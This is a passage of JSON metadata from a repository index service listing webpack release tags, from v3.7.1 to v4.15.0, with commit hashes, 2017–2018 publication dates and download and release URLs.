https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.